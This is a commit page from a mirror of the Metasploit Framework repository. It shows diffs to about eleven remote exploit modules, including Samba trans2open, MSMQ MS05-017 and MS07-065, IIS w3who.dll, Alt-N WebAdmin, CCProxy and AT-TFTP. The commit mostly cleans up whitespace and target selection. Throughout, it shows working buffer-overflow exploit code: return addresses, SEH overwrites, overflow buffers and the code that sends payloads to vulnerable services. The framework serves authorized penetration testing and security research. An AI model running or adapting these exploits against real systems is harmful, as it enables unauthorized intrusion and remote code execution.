infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Various module cleanups 

git-svn-id: file:///home/svn/framework3/trunk@8498 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2010-02-15 00:48:03 +00:00
parent f9ae031055
commit 5d7139ad6f
11 changed files with 183 additions and 191 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
modules/exploits/osx/samba/trans2open.rb
View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,13 +19,13 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Samba trans2open Overflow (Mac OS X)',
'Description' => %q{
This exploits the buffer overflow found in Samba versions
2.2.0 to 2.2.8. This particular module is capable of
exploiting the bug on Mac OS X PowerPC systems.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
@ -33,8 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2003-0201'],
[ 'OSVDB', '4469'],
[ 'BID', '7294'],
[ 'URL', 'http://www.digitaldefense.net/labs/advisories/DDI-1013.txt'],
[ 'BID', '7294']
],
'Privileged' => true,
@ -47,14 +46,14 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Platform' => 'osx',
'Arch' => ARCH_PPC,
'Targets' =>
'Targets' =>
[
['Stack Brute Force', { 'Rets' => [0xbffffdfc, 0xbfa00000, 512] } ],
],
'DisclosureDate' => 'Apr 7 2003',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(139)
@ -75,10 +74,10 @@ class Metasploit3 < Msf::Exploit::Remote
connect
smb_login
# 1988 is required for findrecv shellcode
pattern = rand_text_english(1988)
# This stream covers the framepointer and the return address
pattern[1195, 64] = [curr_ret].pack('N') * 16
@ -97,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
sock.put(trans)
handler
disconnect
rescue EOFError
rescue => e
print_status("Caught exception: #{e}")
@ -107,3 +106,4 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
end

5
modules/exploits/solaris/samba/lsa_transnames_heap.rb
View File

@ -101,12 +101,12 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class)
end
# Need to perform target detection
def autofilter
false
end
def brute_exploit(target_addrs)
if(not @nops)
@ -221,3 +221,4 @@ class Metasploit3 < Msf::Exploit::Remote
end

27
modules/exploits/windows/dcerpc/ms05_017_msmq.rb
View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft Message Queueing Service Path Overflow',
'Description' => %q{
This module exploits a stack overflow in the RPC interface
@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
hostname, so this must be provided via the 'HNAME' option.
Much thanks to snort.org and Jean-Baptiste Marchand's
excellent MSRPC website.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
'StackAdjustment' => -3500,
},
'Targets' =>
'Targets' =>
[
[
'Windows 2000 ALL / Windows XP SP0-SP1 (English)',
@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'DisclosureDate' => 'Apr 12 2005',
'DefaultTarget' => 0))
# Change the default port values to point at MSMQ
register_options(
[
@ -74,21 +74,21 @@ class Metasploit3 < Msf::Exploit::Remote
# Common vulnerability scanning tools report port 445/139
# due to how they test for the vulnerability. Remap this
# back to 2103 for automated exploitation
rport = datastore['RPORT'].to_i
if ( rport == 2103 or rport == 2103 )
if ( rport == 445 or rport == 139 )
datastore['RPORT'] = 2103
end
# The NetBIOS hostname is required to exploit this bug reliably.
if (not datastore['HNAME'])
# XXX automatically determine the hostname
return false
end
true
end
def exploit
# MSMQ supports three forms of queue names, the two we can use are
@ -121,13 +121,13 @@ class Metasploit3 < Msf::Exploit::Remote
connect
print_status("Trying target #{target.name}...")
handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
stubdata =
stubdata =
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
NDR.UnicodeConformantVaryingStringPreBuilt(queue_path)
print_status('Sending exploit ...')
response = dcerpc.call(9, stubdata)
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
@ -157,3 +157,4 @@ class Metasploit3 < Msf::Exploit::Remote
end
end

51
modules/exploits/windows/dcerpc/ms07_065_msmq.rb
View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -20,16 +20,16 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft Message Queueing Service DNS Name Path Overflow',
'Description' => %q{
This module exploits a stack overflow in the RPC interface
to the Microsoft Message Queueing service. This exploit requires
the target system to have been configured with a DNS name and
for that name to be supplied in the 'DNAME' option. This name does
not need to be served by a valid DNS server, only configured on
not need to be served by a valid DNS server, only configured on
the target machine.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'OSVDB', '39123'],
[ 'MSB', 'MS07-065'],
],
'Privileged' => true,
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
'StackAdjustment' => -3500,
},
'Targets' =>
'Targets' =>
[
[
'Windows 2000 Server English',
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'DisclosureDate' => 'Dec 11 2007',
'DefaultTarget' => 0))
# Change the default port values to point at MSMQ
register_options(
[
@ -73,65 +73,65 @@ class Metasploit3 < Msf::Exploit::Remote
# Common vulnerability scanning tools report port 445/139
# due to how they test for the vulnerability. Remap this
# back to 2103 for automated exploitation
rport = datastore['RPORT'].to_i
if ( rport == 2103 or rport == 2103 )
if ( rport == 445 or rport == 139 )
datastore['RPORT'] = 2103
end
# The NetBIOS hostname is required to exploit this bug
if (not datastore['DNAME'])
# XXX automatically determine the hostname
return false
end
true
end
def exploit
connect
print_status("Trying target #{target.name}...")
handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
dname = datastore['DNAME']
boom = rand_text_alphanumeric(4096)
hname,domain = dname.split(".")
if(not domain)
print_status("The DNAME parameter specified is not valid.")
print_status("This option must be the fully-qualified domain name of the target (as it has been configured).")
return
end
off = 310 - (hname.length * 2)
seh = generate_seh_payload(target.ret)
boom[off, seh.length] = seh
buff = Rex::Text.to_unicode("#{dname}\\")
buff << boom
buff << "\x00\x00"
# Data alignment
while(buff.length % 4 != 0)
buff << "\x00"
end
stubdata =
stubdata =
NDR.long(1) + # [in] long arg_1,
NDR.UnicodeConformantVaryingStringPreBuilt(buff) + # [in][string] wchar_t * arg_2,
NDR.long(0) * 5 # ... fields we can ignore
print_status('Sending exploit...')
begin
begin
response = dcerpc.call(6, stubdata)
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Error: The wrong value has been supplied for the DNAME parameter")
print_status("This value must be the fully-qualified domain name of the target")
print_status("Many systems have no FQDN configured and cannot be exploited")
else
else
print_status("An unknown response was received from the server:")
print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0])
end
@ -148,9 +148,10 @@ class Metasploit3 < Msf::Exploit::Remote
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
print_status("No response from the DCERPC service (this is usually a good thing).")
end
handler
disconnect
end
end

74
modules/exploits/windows/http/altn_webadmin.rb
View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Alt-N WebAdmin USER Buffer Overflow',
'Description' => %q{
Alt-N WebAdmin is prone to a buffer overflow condition. This
@ -51,51 +51,52 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Platform' => 'win',
'Targets' =>
'Targets' =>
[
['Automatic', {}],
['WebAdmin 2.0.4 Universal', { 'Ret' => 0x10074d9b }], # 2.0.4 webAdmin.dll
['WebAdmin 2.0.3 Universal', { 'Ret' => 0x10074b13 }], # 2.0.3 webAdmin.dll
['WebAdmin 2.0.2 Universal', { 'Ret' => 0x10071e3b }], # 2.0.2 webAdmin.dll
['WebAdmin 2.0.1 Universal', { 'Ret' => 0x100543c2 }], # 2.0.1 webAdmin.dll
['WebAdmin 2.0.1 Universal', { 'Ret' => 0x100543c2 }], # 2.0.1 webAdmin.dll
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 24 2003'))
register_options([Opt::RPORT(1000)], self.class)
end
# Identify the target based on the WebAdmin version number
def autofilter
res = send_request_raw({
'uri' => '/WebAdmin.DLL'
}, -1)
if (res and res.body =~ /WebAdmin.*v(2\..*)$/)
case $1
when /2\.0\.4/
datastore['TARGET'] = 0
when /2\.0\.3/
datastore['TARGET'] = 1
when /2\.0\.2/
datastore['TARGET'] = 2
when /2\.0\.1/
datastore['TARGET'] = 3
else
return false
end
return true
end
# Not vulnerable
return false
end
def exploit
mytarget = target
if (target.name =~ /Automatic/)
res = send_request_raw({
'uri' => '/WebAdmin.DLL'
}, -1)
if (res and res.body =~ /WebAdmin.*v(2\..*)$/)
case $1
when /2\.0\.4/
mytarget = targets[1]
when /2\.0\.3/
mytarget = targets[2]
when /2\.0\.2/
mytarget = targets[3]
when /2\.0\.1/
mytarget = targets[4]
else
print_error("No target found for v#{$1}")
return
end
else
print_error("No target found")
end
end
user_cook = rand_text_alphanumeric(2)
post_data = 'User=' + make_nops(168) + [target.ret].pack('V') + payload.encoded
post_data = 'User=' + make_nops(168) + [mytarget.ret].pack('V') + payload.encoded
post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'
print_status("Sending request...")
res = send_request_cgi({
'uri' => '/WebAdmin.DLL',
@ -104,15 +105,16 @@ class Metasploit3 < Msf::Exploit::Remote
'content-type' => 'application/x-www-form-urlencoded',
'cookie' => "User=#{user_cook}; Lang=en; Theme=standard",
'data' => post_data,
'headers' =>
'headers' =>
{
'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png',
'Accept-Language' => 'en',
'Accept-Charset' => 'iso-8859-1,*,utf-8'
}
}, 5)
handler
end
end

26
modules/exploits/windows/http/apache_mod_rewrite_ldap.rb
View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Apache module mod_rewrite LDAP protocol Buffer Overflow',
'Description' => %q{
This module exploits the mod_rewrite LDAP protocol scheme handling
@ -26,8 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote
Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.
This module requires REWRITEPATH to be set accurately. In addition,
the target must have 'RewriteEngine on' configured, with a specific
'RewriteRule' condition enabled to allow for exploitation.
'RewriteRule' condition enabled to allow for exploitation.
The flaw affects multiple platforms, however this module currently
only supports Windows based installations.
},
@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
'StackAdjustment' => -3500,
'DisableNops' => 'True',
},
'Targets' =>
'Targets' =>
[
[ 'Automatic', {} ], # patrickw tested OK 20090310 win32
],
@ -69,16 +69,13 @@ class Metasploit3 < Msf::Exploit::Remote
OptString.new('REWRITEPATH', [true, "The mod_rewrite URI path", "rewrite_path"]),
], self.class)
end
def autofilter
return false
end
def check
res = send_request_raw({
'uri' => '/',
'version' => '1.1',
}, 2)
'uri' => '/',
'version' => '1.1',
}, 2)
if (res.to_s =~ /Apache/) # This could be smarter.
return Exploit::CheckCode::Detected
@ -88,10 +85,10 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
# On Linux Apache, it is possible to overwrite EIP by
# sending ldap://<buf> ... TODO patrickw
trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90'
print_status("Sending payload.")
@ -102,3 +99,4 @@ class Metasploit3 < Msf::Exploit::Remote
handler
end
end

7
modules/exploits/windows/http/mcafee_epolicy_source.rb
View File

@ -70,10 +70,6 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class)
end
def autofilter
false
end
def check
connect
@ -120,4 +116,5 @@ class Metasploit3 < Msf::Exploit::Remote
def wfs_delay
25
end
end
end

49
modules/exploits/windows/http/psoproxy91_overflow.rb
View File

@ -54,8 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'Windows XP Pro SP2 English', { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll
],
'Privileged' => false,
'DisclosureDate' => 'Feb 20 2004',
'DefaultTarget' => 0))
'DisclosureDate' => 'Feb 20 2004'
))
register_options(
[
@ -63,29 +63,26 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class)
end
def autofilter
false
end
def check
connect
sock.put("GET / HTTP/1.0\r\n\r\n")
banner = sock.get(-1,3)
if (banner =~ /PSO Proxy 0\.9/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
exploit = rand_text_alphanumeric(1024, payload_badchars)
exploit += [target['Ret']].pack('V') + payload.encoded
sock.put(exploit + "\r\n\r\n")
disconnect
handler
def check
connect
sock.put("GET / HTTP/1.0\r\n\r\n")
banner = sock.get(-1,3)
if (banner =~ /PSO Proxy 0\.9/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
exploit = rand_text_alphanumeric(1024, payload_badchars)
exploit += [target['Ret']].pack('V') + payload.encoded
sock.put(exploit + "\r\n\r\n")
disconnect
handler
end
end

69
modules/exploits/windows/isapi/w3who_query.rb
View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft IIS ISAPI w3who.dll Query String Overflow',
'Description' => %q{
This module exploits a stack overflow in the w3who.dll ISAPI
@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
Windows 2000 and Windows XP (SP2). When exploiting Windows
XP, the payload must call RevertToSelf before it will be
able to spawn a command shell.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
@ -55,61 +55,61 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Platform' => 'win',
'Targets' =>
'Targets' =>
[
['Automatic Detection', { }],
['Windows 2000 RESKIT DLL [Windows 2000]', { 'Rets' => [ 48, 0x01169f4a ] }], # pop, pop, ret magic
['Windows 2000 RESKIT DLL [Windows XP]', { 'Rets' => [ 748, 0x10019f4a ] }], # pop, pop, ret magic
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 6 2004'))
register_options(
[
OptString.new('URL', [ true, "The path to w3who.dll", "/scripts/w3who.dll" ]),
], self.class)
end
# Identify the target based on the IIS version
def autofilter
res = send_request_raw({
'uri' => datastore['URL']
}, -1)
# Was a vulnerable system detected?
if (res and res.body =~ /Access Token/)
case res.headers['Server']
when /5\.1/
datastore['TARGET'] = 1
else
datastore['TARGET'] = 0
end
return true
end
# Not vulnerable
return false
end
def check
res = send_request_raw({
'uri' => datastore['URL']
}, -1)
if (res and res.body =~ /Access Token/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
mytarget = target
if(mytarget.name =~ /Automatic/)
res = send_request_raw({
'uri' => datastore['URL']
}, -1)
# Was a vulnerable system detected?
if (res and res.body =~ /Access Token/)
case res.headers['Server']
when /5\.1/
mytarget = targets[2]
else
mytarget = targets[1]
end
else
print_error("No valid target found")
end
end
buf = rand_text_english(8192, payload_badchars)
buf[target['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
buf[target['Rets'][0] - 0, 4] = [ target['Rets'][1] ].pack('V')
buf[target['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
buf[target['Rets'][0] - 4 - payload.encoded.length, payload.encoded.length] = payload.encoded
buf[mytarget['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
buf[mytarget['Rets'][0] - 0, 4] = [ mytarget['Rets'][1] ].pack('V')
buf[mytarget['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
buf[mytarget['Rets'][0] - 4 - payload.encoded.length, payload.encoded.length] = payload.encoded
print_status("Sending request...")
r = send_request_raw({
'uri' => datastore['URL'],
@ -120,3 +120,4 @@ class Metasploit3 < Msf::Exploit::Remote
end
end

29
modules/exploits/windows/proxy/ccproxy_telnet_ping.rb
View File

@ -3,10 +3,10 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# http://metasploit.com/framework/
##
require 'msf/core'
@ -14,11 +14,11 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
def initialize(info = {})
super(update_info(info,
'Name' => 'CCProxy <= v6.2 Telnet Proxy Ping Overflow',
'Description' => %q{
This module exploits the YoungZSoft CCProxy <= v6.2 suite
@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote
long address to the 'ping' command.
},
'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ],
'Arch' => [ ARCH_X86 ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
@ -35,14 +35,14 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'OSVDB', '11593' ],
[ 'BID', '11666 ' ],
[ 'URL', 'http://milw0rm.com/exploits/621' ],
],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
{
'Space' => 1012,
'BadChars' => "\x00\x07\x08\x0a\x0d\x20",
},
@ -57,31 +57,27 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll
],
'DisclosureDate' => 'Nov 11 2004'))
register_options(
[
Opt::RPORT(23),
], self.class)
end
def autofilter
false
end
def check
def check
connect
banner = sock.get_once(-1,3)
disconnect
if (banner =~ /CCProxy Telnet Service Ready/)
return Exploit::CheckCode::Appears
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
connect
sploit = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
sock.put(sploit + "\r\n")
@ -90,3 +86,4 @@ class Metasploit3 < Msf::Exploit::Remote
end
end

17
modules/exploits/windows/tftp/attftp_long_filename.rb
View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -27,8 +27,8 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ],
'Version' => '$Revision$',
'References' =>
[
'References' =>
[
['CVE', '2006-6184'],
['OSVDB', '11350'],
['BID', '21320'],
@ -68,22 +68,19 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class)
end
def autofilter
false
end
def exploit
connect_udp
sploit = "\x00\x02" + make_nops(25 - datastore['LHOST'].length)
sploit << payload.encoded
sploit << [target['Ret']].pack('V') # <-- eip = jmp esp. we control it.
sploit << "\x83\xc4\x28\xc3" # <-- esp = add esp 0x28 + retn
sploit << "\x00" + "netascii" + "\x00"
udp_sock.put(sploit)
disconnect_udp
end
end